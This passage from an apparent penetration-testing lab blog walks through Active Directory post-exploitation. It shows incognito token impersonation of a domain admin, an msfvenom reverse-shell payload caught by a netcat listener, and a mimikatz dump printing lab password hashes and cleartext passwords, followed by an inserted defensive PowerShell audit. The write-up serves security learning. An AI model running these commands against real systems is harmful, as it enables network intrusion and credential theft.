cmd.exe 1772 Console 0 2,832 K Running NT AUTHORITY\SYSTEM 0:00:00 C:\WINDOWS\system32\cmd.exe - tasklist /v
wmiprvse.exe 180 Console 0 5,884 K Running NT AUTHORITY\NETWORK SERVICE 0:00:00 N/A
PSEXESVC.exe 1708 Console 0 3,624 K Running NT AUTHORITY\SYSTEM 0:00:00 N/A
cmd.exe 304 Console 0 2,316 K Running EXAMPLEAD\exampleadm 0:00:00 N/A
tasklist.exe 1200 Console 0 4,144 K Running NT AUTHORITY\SYSTEM 0:00:00 OleMainThreadWndName
Not bad. See the cmd.exe above run by exampleadm? At this point the tokens should have been loaded on the system. We have two options. We can impersonate the domain admin token of exampleadm; this won't give us the password, but it would essentially make us exampleadm. Or we could dump the cached credentials and logon passwords using mimikatz. Let's do both.
The former, impersonation, is quite easy since we already have incognito on the box and we don't need the password. Verify that exampleadm tokens are available for impersonation
C:\Lab27\incognito2>incognito list_tokens -u
incognito list_tokens -u
[*] Enumerating tokens
[*] Listing unique users found

Delegation Tokens Available
============================================
EXAMPLEAD\ExampleAdm
EXAMPLEAD\ExampleUser
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM

Impersonation Tokens Available
============================================
EXAMPLEAD\Administrator
NT AUTHORITY\ANONYMOUS LOGON

Administrative Privileges Available
============================================
SeAssignPrimaryTokenPrivilege
SeCreateTokenPrivilege
SeTcbPrivilege
SeTakeOwnershipPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeDebugPrivilege
SeImpersonatePrivilege
SeLoadDriverPrivilege
Now we need a reverse shell payload which incognito can run as the domain admin to connect back to Kali.
root@Kali:~/PTP/5.3 XSS/Lab 27# msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=172.16.111.30 LPORT=4390 -f exe -o 200_dom_admin.exe
No encoder or badchars specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
Saved as: 200_dom_admin.exe
Copy this over and run it with incognito
C:\Lab27\incognito2>incognito.exe execute -c "EXAMPLEAD\ExampleAdm" C:\Lab27\200_dom_admin.exe
incognito.exe execute -c "EXAMPLEAD\ExampleAdm" C:\Lab27\200_dom_admin.exe
If done correctly we should get a reverse shell as the domain admin on Kali
root@Kali:~/PTP/5.3 XSS/Lab 27# nc -nlvp 4390
listening on [any] 4390 ...
connect to [172.16.111.30] from (UNKNOWN) [172.16.111.1] 22421
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Lab27\incognito2>cd ..
cd ..

C:\Lab27>whoami.exe && ipconfig /all
whoami.exe && ipconfig /all
EXAMPLEAD\ExampleAdm

Windows IP Configuration

        Host Name . . . . . . . . . . . . : PCClientXP
        Primary Dns Suffix  . . . . . . . : examplead.lan
        Node Type . . . . . . . . . . . . : Unknown
        IP Routing Enabled. . . . . . . . : No
        WINS Proxy Enabled. . . . . . . . : No
        DNS Suffix Search List. . . . . . : examplead.lan

Ethernet adapter Local Area Connection:

        Connection-specific DNS Suffix  . :
        Description . . . . . . . . . . . : VMware Accelerated AMD PCNet Adapter
        Physical Address. . . . . . . . . : 00-50-56-A1-DD-E3
        Dhcp Enabled. . . . . . . . . . . : No
        IP Address. . . . . . . . . . . . : 192.168.200.200
        Subn Mask . . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 192.168.200.1
        DNS Servers . . . . . . . . . . . : 192.168.200.100
Great. We are now exampleadm. Alternatively, if we just want to dump the domain admin credentials with mimikatz we can do that too. Note that for this we don't need to impersonate exampleadm at all: SYSTEM is good enough, since it is king on the local box.
Copy over and run the 32-bit mimikatz (since this is x86 Windows XP).
C:\Lab27\mimikatz>mimikatz.exe

  .#####.   mimikatz 2.1.1 (x86) #17763 Dec  9 2018 23:56:27
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo) ** Kitten Edition **
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # sekurlsa::kerberos

Authentication Id : 0 ; 56797 (00000000:0000dddd)
Session           : CachedInteractive from 0
User Name         : ExampleUser
Domain            : EXAMPLEAD
Logon Server      : DC01
Logon Time        : 5/31/2019 2:44:12 PM
SID               : S-1-5-21-429699418-3694911538-2518303737-1104
        kerberos :
         * Username : ExampleUser
         * Domain   : EXAMPLEAD.LAN
         * Password : (null)

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 5/31/2019 2:44:11 PM
SID               : S-1-5-19
        kerberos :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : NETWORK SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 5/31/2019 2:44:11 PM
SID               : S-1-5-20
        kerberos :
         * Username : PCCLIENTXP$
         * Domain   : EXAMPLEAD
         * Password : 83 13 b4 db 20 48 aa 02 8d dd 46 17 27 93 61 f7 0e 91 1e 49 db 1d 30 63 87 cd 52 f8

Authentication Id : 0 ; 48257 (00000000:0000bc81)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 5/31/2019 2:44:11 PM
SID               :
        kerberos :

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : PCCLIENTXP$
Domain            : EXAMPLEAD
Logon Server      : (null)
Logon Time        : 5/31/2019 2:44:11 PM
SID               : S-1-5-18
        kerberos :
         * Username : pcclientxp$
         * Domain   : EXAMPLEAD.LAN
         * Password : 83 13 b4 db 20 48 aa 02 8d dd 46 17 27 93 61 f7 0e 91 1e 49 db 1d 30 63 87 cd 52 f8

mimikatz # sekurlsa::logonpasswords

Authentication Id : 0 ; 563233 (00000000:00089821)
Session           : Interactive from 0
User Name         : ExampleAdm
Domain            : EXAMPLEAD
Logon Server      : DC01
Logon Time        : 6/2/2019 4:33:16 AM
SID               : S-1-5-21-429699418-3694911538-2518303737-1110
        msv :
         [00000002] Primary
         * Username : exampleadm
         * Domain   : EXAMPLEAD
         * LM       : fb3b015aeac5023d32a9f7564c63ded3
         * NTLM     : 85aca8b4f962c10011235b54deb64d90
         * SHA1     : 485b60c32af0b0cbd1b56a78306f2fc11cbd178e
        wdigest :
         * Username : exampleadm
         * Domain   : EXAMPLEAD
         * Password : manageth3PC'z
        kerberos :
         * Username : ExampleAdm
         * Domain   : EXAMPLEAD.LAN
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 56797 (00000000:0000dddd)
Session           : CachedInteractive from 0
User Name         : ExampleUser
Domain            : EXAMPLEAD
Logon Server      : DC01
Logon Time        : 5/31/2019 2:44:12 PM
SID               : S-1-5-21-429699418-3694911538-2518303737-1104
        msv :
         [00000002] Primary
         * Username : ExampleUser
         * Domain   : EXAMPLEAD
         * LM       : 74ac99ca40ded420c2d133f323f692b3
         * NTLM     : 8e17bb16766eaf072b8d0780fd9f5403
         * SHA1     : 3d6bb41508759a257b58703d7b702bed6a40156e
        wdigest :
         * Username : ExampleUser
         * Domain   : EXAMPLEAD
         * Password : MyPassword!
        kerberos :
         * Username : ExampleUser
         * Domain   : EXAMPLEAD.LAN
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 5/31/2019 2:44:11 PM
SID               : S-1-5-19
        msv :
        wdigest :
        kerberos :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : NETWORK SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 5/31/2019 2:44:11 PM
SID               : S-1-5-20
        msv :
         [00000002] Primary
         * Username : PCCLIENTXP$
         * Domain   : EXAMPLEAD
         * NTLM     : 1cddb4ffe3ce408edfac5bd56d807ac3
         * SHA1     : eb92271baa82e4bedbb2adef40f1320a7d492b1b
        wdigest :
         * Username : (null)
         * Domain   : (null)
         * Password : 83 13 b4 db 20 48 aa 02 8d dd 46 17 27 93 61 f7 0e 91 1e 49 db 1d 30 63 87 cd 52 f8
        kerberos :
         * Username : PCCLIENTXP$
         * Domain   : EXAMPLEAD
         * Password : 83 13 b4 db 20 48 aa 02 8d dd 46 17 27 93 61 f7 0e 91 1e 49 db 1d 30 63 87 cd 52 f8
        ssp :
        credman :

Authentication Id : 0 ; 48257 (00000000:0000bc81)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 5/31/2019 2:44:11 PM
SID               :
        msv :
         [00000002] Primary
         * Username : PCCLIENTXP$
         * Domain   : EXAMPLEAD
         * NTLM     : 1cddb4ffe3ce408edfac5bd56d807ac3
         * SHA1     : eb92271baa82e4bedbb2adef40f1320a7d492b1b
        wdigest :
        kerberos :
        ssp :
        credman :

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : PCCLIENTXP$
Domain            : EXAMPLEAD
Logon Server      : (null)
Logon Time        : 5/31/2019 2:44:11 PM
SID               : S-1-5-18
        msv :
        wdigest :
         * Username : PCCLIENTXP$
         * Domain   : EXAMPLEAD
         * Password : 83 13 b4 db 20 48 aa 02 8d dd 46 17 27 93 61 f7 0e 91 1e 49 db 1d 30 63 87 cd 52 f8
        kerberos :
         * Username : pcclientxp$
         * Domain   : EXAMPLEAD.LAN
         * Password : 83 13 b4 db 20 48 aa 02 8d dd 46 17 27 93 61 f7 0e 91 1e 49 db 1d 30 63 87 cd 52 f8
        ssp :
        credman :
Good. Do note that exampleadm has to log in to leave their tokens behind in order for mimikatz to dump them. If this doesn't happen we don't have a way to impersonate or dump them. We also got exampleuser, a domain user's creds, for good measure.
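As an added defensive check (not part of the original post), the following PowerShell audit covers the two settings that govern what the dump above exposes, WDigest credential caching and LSA protection, and lists the logon sessions whose secrets are currently resident in LSASS. It assumes Windows 7 / PowerShell 3 or later and an elevated prompt; the registry paths and value names are the documented ones, not values taken from the lab.

```powershell
# Added example, not from the original post: audit whether an interactive logon
# leaves a cleartext password in LSASS (as the wdigest block above shows for
# exampleadm) and which sessions currently have secrets resident there.
$wdigestKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest'
$lsaKey     = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'

$build = [int](Get-CimInstance Win32_OperatingSystem).BuildNumber

# UseLogonCredential = 1 keeps cleartext WDigest passwords in memory.
# Windows 8.1 / Server 2012 R2 (build 9600) and later default to 0;
# older systems need KB2871997 plus an explicit 0 to stop caching.
$useLogonCred = (Get-ItemProperty -Path $wdigestKey -Name UseLogonCredential -ErrorAction SilentlyContinue).UseLogonCredential
# RunAsPPL = 1 runs LSASS as a protected process (Windows 8.1+), so a plain
# admin/SeDebugPrivilege process can no longer read its memory.
$runAsPpl = (Get-ItemProperty -Path $lsaKey -Name RunAsPPL -ErrorAction SilentlyContinue).RunAsPPL

$findings = @()
if ($null -eq $useLogonCred) {
    if ($build -lt 9600) {
        $findings += 'WDigest UseLogonCredential absent: cleartext passwords are cached by default on this OS (install KB2871997 and set it to 0)'
    }
} elseif ($useLogonCred -ne 0) {
    $findings += "WDigest UseLogonCredential = $useLogonCred: cleartext passwords are cached in LSASS"
}
if ($build -ge 9600 -and $runAsPpl -ne 1) {
    $findings += 'LSA protection (RunAsPPL) not enabled: LSASS memory is readable with SeDebugPrivilege'
}

# Sessions whose secrets live in LSASS: Interactive (2), RemoteInteractive (10)
# and CachedInteractive (11), the logon types seen in the dump above.
$resident = Get-CimInstance Win32_LogonSession | Where-Object { $_.LogonType -in 2, 10, 11 } | ForEach-Object {
    $session = $_
    $query = "ASSOCIATORS OF {Win32_LogonSession.LogonId='$($session.LogonId)'} WHERE AssocClass=Win32_LoggedOnUser ResultClass=Win32_Account"
    Get-CimInstance -Query $query | ForEach-Object {
        [pscustomobject]@{ Account = "$($_.Domain)\$($_.Name)"; LogonType = $session.LogonType; LogonId = $session.LogonId }
    }
}

if ($findings.Count -eq 0) { 'No credential-caching weaknesses found.' } else { $findings }
'Sessions whose credentials are resident in LSASS:'
$resident | Sort-Object Account, LogonId -Unique | Format-Table -AutoSize
```

An account listed under the second heading on a host with findings is exactly the situation exampleadm was in above: its password is recoverable by anyone who can read LSASS until the session is logged off.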
Right, we are nearly done. Let's now test the domain admin credentials by logging in via RDP to the DC. Remember the nmap scan above? Port 3389 was open, so RDP must be running.
root@Kali:~/PTP/5.3 XSS/Lab 27# proxychains xfreerdp /d:ExampleAD /u:ExampleADM /cert-ignore /v:192.168.200.100
ProxyChains-3.1 (http://proxychains.sf.net)
connected to 192.168.200.100:3389
Password:
And we are done. Unless of course we want to try to escalate to SYSTEM on either PCCLIENT7 or the DC. I'll do the former in a new post.
Unsuccessful attempts
This section will be reserved for enumeration/attack vectors I tried above which didn't lead anywhere. WIP at the moment 🙂
Source: https://ivanitlearning.wordpress.com/2019/06/07/active-directory-exploitation-via-gpp-and-token-impersonation/